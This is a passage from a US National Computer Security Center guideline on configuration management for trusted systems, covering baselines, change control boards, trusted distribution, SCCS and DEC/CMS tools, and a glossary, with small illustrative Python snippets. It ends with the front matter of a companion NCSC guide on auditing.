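            config[change["item"]] = change["new_version"]
    return config

print(current_configuration(baseline, changes))
# {'login.c': 'v3', 'audit.c': 'v1', 'kernel.c': 'v1'}
```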

In a system defining several baselines for different stages of
development, these baselines or milestones should be established
at the system inception to serve as guides throughout the
development process.   Although specific baselines are
established in this case, alternatives may be recommended to
promote greater design flexibility or efficiency. The number of
baselines that may be established for a system will vary
depending upon the size and complexity of the system and the
methods supported by the designers and developers.  It is 
possible to establish multiple baselines existing at the same
time so long as configuration management practices are applied
properly to each baseline.  The following example will discuss
the baseline concept using three common baseline categories:
functional, allocated, and product.  It should be emphasized that
these are simply basic milestones and baselines should be
established depending upon the decisions of the designers and 
developers.   

The first baseline, the functional baseline, is established at
the system inception.  It is derived from the performance and
objectives criteria documentation that consists of specifications
defining the system requirements.  Once these specifications have
been established, any changes to them should be approved.

The requirements produced in the functional baseline may be
divided and subdivided into various configuration items.  Once it
has been decided what the configuration items will be, each of
the items should be given a configuration identifier. From the
analysis of the system requirements the allocated baseline will
be established.  This baseline identifies all of the required
functions with a specific configuration item that is responsible
for the function.  In this baseline, an individual should be
charged with the responsibility for each configuration item.  
All changes affecting specifications defining design requirements
for the system or its configuration items as stated in the
allocated baseline should require approval of the responsible
individual.  

The final baseline, the product baseline, should contain that
version of the system that will be turned over for integration
testing.  This baseline signifies the end of the development
phase and should contain a releasable version of the system.  

The baseline example mentioned earlier, in which one baseline is
established for a single version of a system, entails the same
reasoning as the functional, allocated, and product baseline
example.  The system established as a baseline in the single
baseline example will need to have an approved design before 
being placed under configuration control.  Prior to the design
approval, the system design will have to have undergone some type
of functional review and a process that would allocate these
functions to various configuration items.  Although the early
processes of the design will not be as formal in the single 
baseline example as they are when the early tasks are
individually defined, the system will still benefit from being
under the control of configuration management as a baseline.  The
main point of establishing any baseline is controlling changes to
that baseline by requiring any change to it to undergo an
established change control process.

9.2  Configuration Management at MER, Inc.

MER, Inc., is a manufacturer of computer systems.  Their latest
project consists of building a system that will meet the B2
requirements of the TCSEC.  In the past, their configuration
management has only consisted of quality assurance checks, but to
meet the B2 requirements they realize that they will need to have
specific configuration management procedures in place during the
development and maintenance of the system.    

The project manager was assigned the task of writing the
configuration management procedures and elected to present them
in a configuration management plan.  After doing some research on
what should be contained in the configuration management plan, he
proceeded to write a plan for MER, Inc.  The configuration
management plan that was written listed all of the steps to be
followed when carrying out configuration management for the
system.  It described the procedures to be followed by the
development team and described the automated tools that were
going to be used at MER, Inc. for configuration management. 
These tools consisted of an online tracking data base to be used
for status accounting, an online data base that contained a
listing of all of the items under configuration control, and
automated libraries used for storing software.  Before
development began, all of the development team was responsible
for reading the configuration management plan to ensure that they
were aware of the procedures to be followed for configuration
management.

As the system was developed, the TCB hardware, software, and
firmware were labeled using a configuration item numbering scheme
that had been explained in the configuration management plan.  In
addition, the documentation and tests accompanying these items 
were also given configuration item numbers to assure a consistent
mapping between TCB code and these items.  All of the
configuration item numbers and a description of the items were
stored in a data base that could be queried at any time to derive
the configuration of the entire system.  Software and
documentation were stored in a software library where they could
be retrieved and worked on without affecting the master versions. 
The master copies of all software were stored in a master library
that contained the releasable versions of the software.  Both of
these libraries are protected by a discretionary access control
mechanism to prevent any unauthorized personnel from tampering
with the software.    

During the development of the system, changes were required.  The
procedures for performing a change under configuration control
are described in the configuration management plan.  These are
the same procedures that will remain in effect throughout the
life-cycle of the system.  For each proposed change, a decision
has to be made by management whether or not the change is
feasible and necessary.  MER, Inc. has an online forum for
reviewing suggested changes.  This forum makes it possible for
all of the members of the development team to comment on how the
proposed change may affect their work.  Management would often
consult this forum to help arrive at their final decision.  

After a decision was made, a programmer was assigned to perform
the change.  The programmer would retrieve the most recent
version of the software from the software library and proceed to
change it.  As the change was being performed, the changes were
entered into the online tracking data base.  This made it
possible for members of the development team to query this data
base to find the current status of the change at any time.  After
the change had been performed it was tested and documented, and
upon successful completion it was forwarded to a reviewer. This
reviewer was the software manager, who was the only person
authorized to approve a changed version for release.   After the
change was approved for release, the changed version was stored
in the master library and a second copy was stored in the
software library.  Each change stored in these libraries was 
given a new configuration identification number.   A tool was
available at MER, Inc. that made it possible to identify changes
made to software.  It compared any two versions of the software
and provided a line-by-line listing of the differences between
the two.
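A comparison tool of the kind described can be approximated with the
difflib module of the Python standard library; the two file versions
below are illustrative assumptions.

```python
import difflib

# Compare two versions of a source file and list the line-by-line
# differences between the two, as the tool at MER, Inc. is described
# as doing.  The file contents are invented for the example.
version_1 = ["check_password(pw)\n", "log_attempt(user)\n"]
version_2 = ["check_password(pw)\n", "audit_attempt(user)\n"]

diff = list(difflib.unified_diff(version_1, version_2,
                                 fromfile="v1", tofile="v2"))
print("".join(diff))
# lines removed from v1 are prefixed with "-", lines added in v2 with "+"
```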

It was realized at the beginning of the development process that
there would be times when critical changes would need to be
performed that would not be able to undergo this review process. 
For these changes, emergency procedures had been listed in the 
configuration management plan and a critical fix library was
available to record critical changes that had occurred since a
release.

A control process for changes to the TCB hardware was also 
provided for in the configuration management plan.  The
procedures ensured that changes to the TCB hardware were
traceable and did not violate the security assumptions made by
the TCB software.  Similar to software changes, all hardware
changes were reviewed by the project manager before being 
implemented.  

After a change is made to the TCB software, MER, Inc. performs a
configuration audit to verify the information that exists in the
tracking data base.  Whether or not a change is performed, the
configuration management plan at MER, Inc. specifies that a
configuration audit be performed at least once a month.  This
audit compares the current master version with the status
accounting information to verify that no changes have been
inserted that were not approved.   
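The audit comparison described above might be sketched as follows;
the use of SHA-256 fingerprints and the record layout are assumptions
chosen for the example, not something the guideline prescribes.

```python
import hashlib

# Sketch of the periodic audit: compare a fingerprint of each item in
# the master library against the fingerprint recorded in the status
# accounting information when the change was approved.
approved_records = {
    "TCB-SW-017": hashlib.sha256(b"approved source").hexdigest(),
}
master_library = {
    "TCB-SW-017": b"approved source",
    "TCB-SW-018": b"unrecorded item",    # no approval on record
}

def audit(master_library, approved_records):
    findings = []
    for item, contents in master_library.items():
        digest = hashlib.sha256(contents).hexdigest()
        if approved_records.get(item) != digest:
            findings.append(item)        # a change inserted without approval
    return findings

print(audit(master_library, approved_records))  # ['TCB-SW-018']
```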

This configuration management plan encompasses the descriptive
top-level specification (DTLS), implementation documentation,
source code, object code, test fixtures, and test documentation,
and has been found to satisfy the TCSEC requirements for
configuration management at class B2.

9.3  The Configuration Control Board (CCB)

Configuration control may be performed in different ways.  One
method of configuration control that is in use by systems already
evaluated at TCSEC Class B2 and above is to have the control
carried out by a body of qualified individuals known as the
Configuration Control Board (CCB), also known as the
Configuration Change Board.  The Board is headed by a
chairperson, who is responsible for scheduling meetings and for
giving the final approval on any proposed changes.  The
membership of the CCB may vary in size and composition from
organization to organization, but it should include members from
any or all of the following areas of the system team:

   * Program Management

   * System Engineering

   * Quality Assurance

   * Technical Support

   * Integration and Test

   * System Installation

   * Technical Documentation

   * Hardware and Software/Firmware Acquisition

   * Program Development

   * Security Engineering           

   * User Groups

The members of the CCB should interact periodically, either
through formal meetings, electronic forums, or any other
available means, to discuss configuration management topics such
as proposed changes, configuration status accounting reports, and
other topics that may be of interest to the different areas of
the system development.  These interactions should be held at
periodic intervals to keep the entire system team up-to-date with
all advancements or alterations in the system.  The Board serves
to control changes to the system and ensures that only approved
changes are implemented into the system.  The CCB carries out
this function by considering all proposals for modifications and
new acquisitions and by making decisions regarding them.  

An important part of having cross representation in the CCB from
various groups involved in the system development is to prevent
"unnecessary and contradictory changes to the system while
allowing changes that are responsive to new requirements, changed
functional allocations, and failed tests."[2]  All of the members
of the Board should have a chance to voice their opinions on
proposed changes.  For example, if system engineering proposes a 
change that will affect security, both sides should be able to
present their case at a CCB meeting.  If diversity did not exist
in the CCB, changes might be performed and, upon implementation,
be found to be incompatible with the rest of the system.

The configuration control process begins with the documentation 
of a change request.  This change request should include
justification for the proposed change, all of the affected items
and documents, and the proposed solution. The change request
should be recorded, either manually or online, in order to provide
a way of tracking all proposed changes to the system and to guard
against duplicate change requests being processed.
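The recording step, including the guard against duplicate change
requests, can be sketched as follows; the field names and identifiers
are illustrative assumptions.

```python
# Sketch of change request recording.  Each request carries the
# justification, affected items, and proposed solution described
# above; recording the same request twice is rejected as a duplicate.
requests = {}

def record_request(req_id, justification, affected_items, solution):
    if req_id in requests:                       # guard against duplicates
        raise ValueError(f"duplicate change request: {req_id}")
    requests[req_id] = {"justification": justification,
                        "affected_items": affected_items,
                        "solution": solution,
                        "status": "awaiting CCB review"}

record_request("CR-042", "failed functional test", ["audit.c"],
               "correct bounds check")
try:
    record_request("CR-042", "resubmission", [], "")
except ValueError as err:
    print(err)  # duplicate change request: CR-042
```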

When the change request is recorded, it should be distributed for
analysis by the CCB, which will review and approve or disapprove
the change request.  An analysis of the total impact of the change
will decide whether or not the change should be performed.  The
CCB will approve or disapprove the change request depending upon
whether or not the change is viewed as a necessary and feasible 
change that will further the design goals of the system.  In
situations where trusted systems are involved, the CCB shall also
ensure that the change will not affect the security policy of the
system.

Once a decision has been reached regarding any modifications, the
CCB is responsible for prioritizing the approved modifications to
ensure that those that are most important are developed first.
When prioritizing changes, an effort should be made to have the
changes performed in the most logical order whenever possible.
The CCB is also responsible for assigning an authority to perform
the change and for ensuring that the configuration documentation
is updated properly.  The person assigned to do the change should
have the proper authorization to modify the system, and in
trusted systems processing sensitive information, this
authorization shall be required.  During the development of any
enhancements and new developments, the CCB continues to exert
control over the system by determining the level of testing
required for all developments. 

Upon completion of the change, the CCB is responsible for 
verifying that the change has been properly incorporated and that
only the approved change has been incorporated.   Tests should be
performed on the modified system or TCB to ensure that they
function properly after the change is completed.  The CCB should
review the test results of any developments and should be the
final voice on release decisions.  

The use of a CCB is one way of performing configuration control,
but not every vendor may have the desire or resources to
establish one.  Whatever the preference, there should still be
some way of performing the control processes described
previously.  


10.  OTHER TOPICS

10.1  Trusted Distribution

Related to the configuration management requirements for trusted
systems is the TCSEC requirement for trusted distribution at
class A1 which states:

      "A trusted ADP system control and distribution facility    
      shall be provided for maintaining the integrity of the     
      mapping between the master data describing the current     
      version of the TCB and the on-site master copy of the code 
      for the current version.  Procedures (e.g., site security  
      acceptance testing) shall exist for assuring that the TCB  
      software, firmware, and hardware updates distributed to a  
      customer are exactly as specified by the master            
      copies."[1]

Two questions that the trusted distribution process should answer
are: (a) Did the received product come from the organization that
was supposed to have sent it? and (b) Did the recipient receive
exactly what the sender intended?
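Both questions can be addressed with a keyed integrity check, sketched
below.  The shared-key scheme, the key handling, and the update format
are assumptions made for illustration; they are one possible mechanism,
not the one the TCSEC mandates.

```python
import hashlib
import hmac

# (a) only the vendor holds the key, so a valid tag implies origin;
# (b) the tag matches only if the update is bit-for-bit identical to
# what the master copy specifies.
vendor_key = b"key-established-out-of-band"   # illustrative assumption

def sign_update(update: bytes) -> str:
    return hmac.new(vendor_key, update, hashlib.sha256).hexdigest()

def verify_update(update: bytes, tag: str) -> bool:
    return hmac.compare_digest(sign_update(update), tag)

update = b"TCB software update, version 2.1"
tag = sign_update(update)
print(verify_update(update, tag))                # True
print(verify_update(update + b"tampered", tag))  # False
```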

Configuration management assists trusted distribution by ensuring
that no alterations are made to the TCB from the time of approved
modification to the time of release.  The additional
configuration management requirement at A1 that supports this is,
"A combination of technical, physical and procedural safeguards
shall be used to protect from unauthorized modification or
destruction the master copy or copies of all material used to
generate the TCB"[1] (Requirement 19).  This requirement calls
for strict control over changes made to any versions of the TCB. 
The possibility that a change may not be performed as specified,
or that a harmful modification may be inserted into the TCB
should be considered and the authority to perform changes to the
master copy should be restricted.  A single master copy authority
should be made responsible for ensuring that only approved and
acceptable changes are implemented into the master copy.

Configuration status accounting records and auditing reports can
provide accountability for all TCB versions in use.  In the event
of altered copies being distributed or "bogus" copies being
distributed that were not manufactured by the vendor, 
configuration management records make it possible to assess the
validity and accuracy of all TCB versions.  Trusted distribution
demonstrates the need for configuration control over all changes to
the TCB.  Without configuration control there would be no
accountability for the TCB versions distributed to the customer. 


10.2  Functional Testing

"The system developer shall provide to the evaluators a document
that describes the test plan, test procedures that show how the
security mechanisms were tested, and results of the security
mechanisms' functional testing."[1]  The creation and maintenance
of these functional tests is required to be part of the
configuration management procedures.  Test results and any
affected test documentation shall be maintained under
configuration management and updated wherever necessary
(Requirements 7, 8).  The tests should be repeatable, and include
sufficient documentation so that any knowledgeable programmer
will be able to figure out how to run them.  The test plan for
the system should be described in the functional specification
(or other design documentation) for the TCB, along with
descriptions of the test programs.  The test plan and programs
should be reviewed and audited along with the programs they test,
although the coding standards need not be as strict as those of
the tested programs.

It is not acceptable to generate tests only for code that was
opened or replaced; all of the portions of the TCB that were
affected by the change should also be tested.  The NCSC
evaluators can provide a description of the security functional
tests required to meet the TCSEC testing requirements, including
the testing required as stated above for configuration
management.

10.3  Configuration Management Training

Each new technical employee should receive training in the
configuration management procedures that a particular
installation follows.  Experienced programmers, although they may
be familiar with some form of configuration management, will also
require training in any new procedures, e.g., an automated
accounting system, that they will be required to follow. 
Training should be conducted either "by holding formal classes or
by setting aside sufficient time for the reading of the company
wide configuration standards."[2]  New programmers should become
familiar with the Configuration Management Plan before being
allowed to incorporate any changes into the design baseline.  It
should be stressed that a failure to maintain the configuration
management standards, as may result from untrained employees, could
prevent the system from receiving a rating.[2]  


10.4  Configuration Management Supervision

A successful configuration management system requires adherence
to many procedures.  Considering the demands made on the system
staff, errors may occur and shortcuts may be sought which would
jeopardize the entire configuration management plan.  A review
process should be present to ensure that no single person can
create a change to the system and implement it without being
subject to some type of approval process.  Supervisors, who are
responsible for the personnel performing the change, should be
required to sign an official record attesting that the change is
the correct change.[2]   

Proper supervision also provides assurance that whoever performs
the change has the proper authorization to do so.  Changes should
not be performed by personnel who are not qualified to make
them.  Also, in systems that process sensitive information, the
programmer performing the change shall possess the proper
security clearance.

Management itself must directly support the configuration
management plan in order for it to work.  It should not encourage
cutting configuration management corners under any circumstances,
e.g., due to scheduling or budgeting.  Management should be
willing to support the expenditure of money, people, and time to
allow for proper configuration management. 

                                25

11.  RATINGS MAINTENANCE PROGRAM

The Ratings Maintenance Program (RAMP) has been developed by the
NCSC in an effort to keep the Evaluated Products List (EPL)
current.  By training vendor personnel to recognize which changes
may adversely affect the implementation of the security policy of
the system, and to track these changes to the evaluated product
through the use of configuration management, RAMP will permit a
vendor to maintain the rating of the evaluated product without
having to re-evaluate the new version.  Because changes from one
version of an operating system to the next version may affect the
security features and assurances of that operating system,
configuration management is an integral part of RAMP.  For a
system to maintain its rating under this program, the NCSC shall
be assured, through the vendor's configuration management
procedures, that the changes made have not adversely affected the
implementation of the security mechanisms and assurances of the
system.

Each RAMP participant shall develop an NCSC approved Rating
Maintenance Plan (RMPlan) which includes a detailed Configuration
Management Plan (CMP) to support the rating maintenance process.
This requirement applies to all systems participating in RAMP,
regardless of class.  For further information about the RAMP
program and about configuration management requirements for RAMP,
contact:

           National Computer Security Center
           9800 Savage Road
           Fort George G. Meade, MD  20755-6000

           Attention: Chief, Requirements and Resources Division

                                26

12.  CONFIGURATION MANAGEMENT SUMMARY

The assurance provided by configuration management is beneficial
to all systems. It is a requirement for trusted systems for
classes B2 and above that a configuration management system "be
in place that maintains control of changes to the descriptive
top-level specification, other design data, implementation
documentation, source code, the running version of the object
code, and test fixtures and documentation"[1] (Requirements 1, 2,
3, 4, 5, 6, 7, 8).  Although configuration management is a
requirement for trusted systems for classes B2 and above, it
should be in place in all systems regardless of class rating, or
whether the system has a rating at all.   

Successful configuration management is built around four main
objectives: control, identification, accounting, and auditing. 
Through the accomplishment of these objectives, configuration
management is able to maintain control over the TCB and protect
it against "unauthorized changes that could cause protection
mechanisms to malfunction or be bypassed completely."[1]  Even
for those aspects of the system which are not security-relevant,
configuration management is still a valuable method of ensuring
that all of the properties of a system are maintained after a
change.  It is very important to the success of configuration
management that a formal configuration management plan be adhered
to during the life-cycle of the system.

A successful configuration management plan should begin with
early and complete definition of configuration management goals,
scope, and procedures.  The success of configuration management
is dependent upon accuracy.  Changes should be identified and
accounted for accurately, and after the change is completed, the
change, and all affected parts of the system should be thoroughly
documented and tested.  

Configuration management provides control and traceability for
all changes made to the system.  Changes in progress are able to
be monitored through configuration status accounting information
in order to control the change and to evaluate its impact on
other parts of the system.  

An important part of having a successful configuration management
plan is that the people involved with it must adhere to its
procedures in order to keep all documentation current and the
status of changes up-to-date.  

With a firm and well-documented configuration management plan in 
place, the occurrence of unnecessary or duplicate changes will 
be greatly reduced, and any necessary changes that are 

                                27

required can be identified with ease.  An effective
configuration management system should be able to show what was
supposed to have been built, what was built, and what is
presently being built. 

                                28

APPENDIX A:  AUTOMATED TOOLS

Automated tools may be used to perform some of the configuration
management functions that previously had to be performed
manually.  A data base management system, even with just a
limited query system, may be used to perform the configuration
audit and status accounting functions of configuration
management.  The principle behind using automated systems is that
text, both source code and other documents involved in the
development of the system, can be entered into a Master Library
and modified only through the use of the automated system.  This
prevents anyone from performing a change without having the
proper authorization to access the configuration data base.  "In
general, only one program librarian, who should be the project
manager or someone directly responsible to the manager, should
have write access to the Master Library during development."[2]  

A number of software developers have created software control
facilities that are currently available to be used for
configuration status accounting.  A brief discussion of two of
these systems follows.

A.1   UNIX (1) SCCS

"Under the Unix (1) system, the make utility, and the elements
admin, get, prs, and delta, which comprise the Source Code
Control System, provide a basic configuration accounting system. 
Initially a directory is created using the mkdir function.  At
this point, it is possible to use the owner, group, world
protection scheme provided by Unix (1) to protect the directory. 
In addition a list of login identifiers is created which
specifies who may update each element to be processed by SCCS."
[2]

Following directory initiation, each document is entered using
the admin -n function.  Each entry that is made is referred to as
an element.  As each update is made to a new element, a new
generation of that element, known as a delta, is created.  The
name of each element that is stored in a file by SCCS is preceded
by "s.".  If a file is added to the directory that does not
contain this prefix, it is ignored by the SCCS function calls. 
When the admin function is called, a number of arguments may be
specified that "specify parameters that may affect the file, and
may be changed by a subsequent call to admin.  The alogin
argument is used to create the equivalent of an access control
list by listing the login names of users who can apply the delta
function to the element, thus creating either a new generation 

(1) UNIX is a registered trademark of AT&T Bell Laboratories
                                29  

(delta) or variant branch."[2]

The initial release, or initial delta, of each code module is
entered into the SCCS directory through the admin -n function,
thus creating the Master Library.  The programmer may update each 
module in the Master Library by using the get -e function "which
indicates that the module will be edited and then the completed
document will be reentered into the directory using the delta
function.  As long as the module being edited was extracted from
the SCCS directory using get -e, it can be returned to the
library using delta, and all necessary update information will be
entered with it.  The get function can be used to extract a copy
of any document, but after it is edited it cannot be reentered
into the library."[2]
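
The get -e / delta locking rule described above can be sketched
with a small hypothetical Python model (this is an illustration of
the rule only, not SCCS itself; the class and method names are
invented):

```python
# Toy model of the SCCS checkout rule: a module extracted with
# `get -e` may be reentered with `delta`, while a copy taken with
# plain `get` cannot be returned to the library.
class Library:
    def __init__(self):
        self.checked_out = set()   # modules extracted for editing

    def get(self, module, edit=False):
        """Extract a copy; edit=True corresponds to `get -e`."""
        if edit:
            self.checked_out.add(module)
        return f"copy of {module}"

    def delta(self, module):
        """Reenter an edited module; only allowed after `get -e`."""
        if module not in self.checked_out:
            raise PermissionError("module was not extracted with get -e")
        self.checked_out.discard(module)

lib = Library()
lib.get("kernel.c", edit=True)   # get -e: extract for editing
lib.delta("kernel.c")            # delta: reenter with update info
lib.get("kernel.c")              # plain get: read-only copy
# lib.delta("kernel.c")          # would raise PermissionError
```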

"SCCS provides the capability to specify a software build by the
way it assigns an SCCS Identification Number (SID) to each output
of the delta function."[2]  One can get any version of a text or
source code by specifying the appropriate SID.  "There are
straightforward rules regarding how to specify the particular SID
desired when get is called.  If no SID is specified, the latest
release and level is provided."  The SID of the resulting call to
delta is affected by the SID used when get -e is called.[2]
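
As a rough illustration of trunk SID numbering (release.level),
the following hypothetical Python sketch shows how a delta made
after get -e advances the level of the retrieved SID; branch SIDs
(release.level.branch.sequence) are omitted:

```python
# Hypothetical sketch of trunk SID assignment (release.level only);
# branch deltas and SCCS itself are not modeled.
def delta_sid(retrieved_sid):
    """SID created by `delta` after `get -e` retrieved `retrieved_sid`."""
    release, level = (int(part) for part in retrieved_sid.split("."))
    return f"{release}.{level + 1}"

print(delta_sid("1.1"))   # editing delta 1.1 creates delta 1.2
print(delta_sid("2.3"))   # editing delta 2.3 creates delta 2.4
```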

"The function prs allows for configuration accounting, since it
extracts information from the s. files in the SCCS directory and
prints them out for the user.  Prs can be used to quickly create
reports, listing one or two important values such as the last
modified date for many SCCS files, or many values for one or two
files.  Larger reports can also be processed and created using an
editor."[2] 

A.2  VAX DEC/CMS 

"VAX DEC/CMS [7] is also used to track a history of each text
file stored in a CMS directory, but CMS does significantly more
auditing and cross-checking than admin does.  For example, if an
editor is used directly to modify a file in a CMS directory, any
further use by CMS of that file generates a warning message. 
Any files entered into a CMS directory by other than the CMS
utility will cause CMS itself to issue a warning message when it
is invoked for that directory.  Otherwise, the process of
configuration accounting is similar to SCCS.

The CMS CREATE LIBRARY function causes a directory to be set up,
and initial logging to start.  The project manager enters each
element into the directory by using the CMS CREATE ELEMENT
function.  One must RESERVE an element of a library to modify it,

                                30

and it can only be put back into the library using the REPLACE
function.  If someone else has RESERVEd an element between the
original programmer's RESERVE and REPLACE calls, a warning is
issued to both programmers and the occurrence is logged.  To get
a sample copy of the text, such as a program source, the FETCH
function will generate the latest generation or any specified
generation of an element, but will not allow an edited copy to be
reinserted into the library.  The SHOW function can be used to
audit the information about each element in the library.

Differences between SCCS and DEC/CMS appear in the handling of software
builds.  In Unix (1) a build must be either described in a
makefile, or else each element to be used in a build must be
retrieved from the SCCS directory using get, placed in another
directory, and the makefile then may refer to these source files
to create the executable build.  In CMS, the process of selecting
only a subset of source files, including some which are not the
most current, is automated by the use of class and group
mechanisms.  To explain how this works, one must understand the
CMS concepts of generations and variants.  Each generation of a
file corresponds to a Unix (1) delta.  Generations are normally
numbered in ascending order.  CMS also has the capability of
creating a variant development line to any generation by
specifying in the REPLACE function a variant name.  For example,
if one RESERVEs generation 3 of an element, then performs a
REPLACE/VARIANT = T, this will create generation 3T1 which may
then be developed separately from generation 3.  The first time
this is used, the equivalent of an SCCS branch delta is created. 
Branches themselves can have branches, a capability that SCCS
does not have.
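
The generation and variant numbering just described can be
illustrated with a small hypothetical Python model (the function
is invented for illustration and is not part of DEC/CMS):

```python
import re

# Hypothetical model of CMS generation numbering.  REPLACE on a
# reserved generation bumps the trailing number; REPLACE/VARIANT=<name>
# starts a variant line, e.g. generation 3 plus variant "T" yields 3T1.
def next_generation(current, variant=None):
    if variant is not None:
        return f"{current}{variant}1"      # start a new variant line
    prefix, digits = re.match(r"(.*?)(\d+)$", current).groups()
    return f"{prefix}{int(digits) + 1}"    # continue the current line

print(next_generation("2"))               # mainline: 2 -> 3
print(next_generation("3", variant="T"))  # variant line: 3 -> 3T1
print(next_generation("3T1"))             # within the variant: 3T1 -> 3T2
```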

A group can be defined within a CMS directory, using the CMS
CREATE GROUP, and CMS INSERT ELEMENT functions.  A group is
composed of all generations, including variant generations, of
all elements inserted into the group.  Groups can be included
within other groups.  Groups can be defined with a non-empty
intersection so that they have overlapping membership.

The CMS CREATE CLASS function, together with the CMS INSERT
GENERATION function, can be used to specify the exact elements of
a software build, and the DESCRIPTION file can then refer to the
entire class by using the /GENERATION=classname qualifier on
either the source or action line of a dependency rule.  The
makefile required by Unix (1) SCCS can be much more complex when
it is required to describe a software build for intermediate
testing."[2]   

(1) UNIX is a registered trademark of AT&T Bell Laboratories

                                31

GLOSSARY

Automatic Data Processing (ADP) System - An assembly of computer
hardware, firmware, and software configured for the purpose of
classifying, sorting, calculating, computing, summarizing,
transmitting and receiving, storing, and retrieving data with a
minimum of human intervention.[1]

Baseline - A set of critical observations or data used for a
comparison or a control.  A baseline indicates a cutoff point in
the design and development of a configuration item beyond which
configuration does not evolve without undergoing strict
configuration control policies and procedures.

Configuration Accounting - The recording and reporting of
configuration item descriptions and all departures from the
baseline during design and production.[2]  

Configuration Audit - An independent review of computer software
for the purpose of assessing compliance with established
requirements, standards, and baselines.[2]

Configuration Control - The process of controlling modifications
to the system's design, hardware, firmware, software, and
documentation, which provides sufficient assurance that the
system is protected against the introduction of improper
modifications prior
to, during, and after system implementation.

Configuration Control Board (CCB) - An established committee that
is the final authority on all proposed changes to the ADP system.

Configuration Identification - The identifying of the system
configuration throughout the design, development, test, and
production tasks.   

Configuration Item  - The smallest component of hardware,
software, firmware, documentation, or any of its discrete
portions, which is tracked by the configuration management
system.

Configuration Management - The management of changes made to a
system's hardware, software, firmware, documentation, tests, test
fixtures, and test documentation throughout the development and
operational life of the system.

Descriptive Top-Level Specification (DTLS) - A top-level 
specification that is written in a natural language (e.g.,
English), an informal program design notation, or a combination
of the two.[1]

                                32

Firmware - Equipment or devices within which computer 
programming instructions necessary to the performance of the 
device's discrete functions are electrically embedded in such a  
manner that they cannot be electrically altered during normal
device operations.[3]

Formal Security Policy Model - An accurate and precise
description, in a formal, mathematical language, of the security
policy supported by the system.

Formal Top-Level Specification - A top-level specification that
is written in a formal mathematical language to allow theorems
showing the correspondence of the system specifications to its
formal requirements to be hypothesized and formally proven.[1]

Granularity - The relative fineness or coarseness by which a
mechanism can be adjusted.  The phrase "the granularity of a
single user" means the access control mechanism can be adjusted
to include or exclude any single user.[1] 

Hardware - The electric, electronic, and mechanical equipment
used for processing data.[3]

Informal Security Policy Model - An accurate and precise
description, in a natural language (e.g., English), of the
security policy supported by the system. 

Software - Various programming aids that are frequently supplied
by the manufacturers to facilitate the purchaser's efficient
operation of the equipment.  Such software items include various
assemblers, generators, subroutine libraries, compilers,
operating systems, and industry application programs.[6]

Tools - The means for achieving an end result.  The tools
referred to in this guideline are documentation, procedures, and
the organizational body, i.e., the CCB, which all contribute to
achieving the control objective of configuration management. 

Trusted Computing Base (TCB) - The totality of protection
mechanisms within a computer system -- including hardware,
firmware, and software -- the combination of which is responsible
for enforcing a security policy.  A TCB consists of one or more
components that together enforce a unified security policy over a
product or system.  The ability of a TCB to correctly enforce a
security policy depends solely on the mechanisms within the TCB
and on the correct input by system administrative personnel of
parameters (e.g., a user's clearance) related to the security
policy.[1]

                                33

REFERENCES

1.   National Computer Security Center, DOD Trusted Computer     
     System Evaluation Criteria, DOD, DOD 5200.28-STD, 1985.

2.   Brown, R. Leonard, "Configuration Management for Development 
     of a Secure Computer System", ATR-88(3777-12)-1, The        
     Aerospace Corporation, 1987.

3.   Subcommittee on Automated Information System Security,      
     Working Group #3, "Dictionary of Computer Security          
     Terminology", 23 November 1986.

4.   Bersoff, Edward H., Henderson, Vilas D., Siegal, Stanley G., 
     Software Configuration Management, Prentice Hall, Inc.,     
     1980.  

5.   Samaras, Thomas T., Czerwinski, Frank L., Fundamentals of   
     Configuration Management, Wiley-Interscience, 1971.

6.   Sipple, Charles J., Computer Dictionary, Fourth Edition,    
     Howard W. Sams & Co., 1985.

7.   Digital Equipment Corporation, VAX DEC/CMS Reference Manual,
     AA-L372B-TE, Digital Equipment Corporation, 1984.

                                34 

                                              NCSC-TG-001 
                                         Library No. S-228,470 

                          FOREWORD 

This publication, "A Guide to Understanding Audit in Trusted 
Systems," is being issued by the National Computer Security 
Center (NCSC) under the authority of and in accordance with 
Department of Defense (DoD) Directive 5215.1.  The guidelines 
described in this document provide a set of good practices 
related to the use of auditing in automatic data processing 
systems employed for processing classified and other sensitive 
information. Recommendations for revision to this guideline are 
encouraged and will be reviewed biannually by the National 
Computer Security Center through a formal review process.  
Address all proposals for revision through appropriate channels 
to:  

       National Computer Security Center 
       9800 Savage Road 
       Fort George G. Meade, MD  20755-6000  

       Attention: Chief, Computer Security Technical Guidelines 

_________________________________ 
Patrick R. Gallagher, Jr.                     28 July 1987 
Director 
National Computer Security Center  

                                   i 

                          ACKNOWLEDGEMENTS 

Special recognition is extended to James N. Menendez, National 
Computer Security Center (NCSC), as project manager of the 
preparation and production of this document. 

Acknowledgement is also given to the NCSC Product Evaluations 
Team who provided the technical guidance that helped form this 
document and to those members of the computer security community 
who contributed their time and expertise by actively
participating in the review of this document. 

                                   ii 

                          CONTENTS 

FOREWORD ...................................................  i 

ACKNOWLEDGEMENTS ...........................................  ii 

CONTENTS ...................................................  iii

PREFACE .....................................................  v 

1. INTRODUCTION .............................................  1 

    1.1 HISTORY OF THE NATIONAL COMPUTER SECURITY CENTER ....  1 
    1.2 GOAL OF THE NATIONAL COMPUTER SECURITY CENTER .......  1 

2. PURPOSE ..................................................  2 

3. SCOPE ....................................................  3 

4. CONTROL OBJECTIVES .......................................  4 

5. OVERVIEW OF AUDITING PRINCIPLES ..........................  8 

    5.1 PURPOSE OF THE AUDIT MECHANISM.......................  8 
    5.2 USERS OF THE AUDIT MECHANISM.........................  8 
    5.3 ASPECTS OF EFFECTIVE AUDITING .......................  9 

         5.3.1 Identification/Authentication ................  9 
         5.3.2 Administrative ...............................  10
         5.3.3 System Design ................................  10

    5.4 SECURITY OF THE AUDIT ...............................  10 

6. MEETING THE CRITERIA REQUIREMENTS ........................  12

    6.1 THE C2 AUDIT REQUIREMENT ............................  12

         6.1.1 Auditable Events .............................  12
         6.1.2 Auditable Information ........................  12
         6.1.3 Audit Basis ..................................  13

    6.2 THE B1 AUDIT REQUIREMENT ............................  13

         6.2.1 Auditable Events .............................  13
         6.2.2 Auditable Information ........................  13
         6.2.3 Audit Basis ..................................  14

                                  iii 

                          CONTENTS (Continued) 

    6.3 THE B2 AUDIT REQUIREMENT ............................  14

         6.3.1 Auditable Events .............................  14
         6.3.2 Auditable Information ........................  14
         6.3.3 Audit Basis ..................................  14

    6.4 THE B3 AUDIT REQUIREMENT ............................  15

         6.4.1 Auditable Events .............................  15
         6.4.2 Auditable Information ........................  15
         6.4.3 Audit Basis ..................................  15

    6.5 THE A1 AUDIT REQUIREMENT ............................  16

         6.5.1 Auditable Events .............................  16
         6.5.2 Auditable Information ........................  16
         6.5.3 Audit Basis ..................................  16 

